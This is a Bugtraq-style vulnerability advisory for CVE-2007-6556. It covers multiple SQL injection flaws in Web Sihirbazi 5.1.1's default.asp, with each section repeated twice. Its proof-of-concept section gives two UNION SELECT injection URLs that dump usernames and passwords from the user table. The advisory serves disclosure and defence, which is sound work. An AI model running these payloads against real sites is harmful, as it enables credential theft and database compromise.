Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
BID:27031
Info
Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27031 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6556 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | bypas is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Web Sihirbazi Web Sihirbazi 5.1.1 |
| Not Vulnerable: | |
Discussion
Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Web Sihirbazi 5.1.1; other versions may also be affected.
Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Web Sihirbazi 5.1.1; other versions may also be affected.
Exploit / POC
Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user
Solution / Fix
Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Web Sihirbazi 'default.asp' Multiple SQL Injection Vulnerabilities
References:
References:
- Home Page (Web Sihirbazi)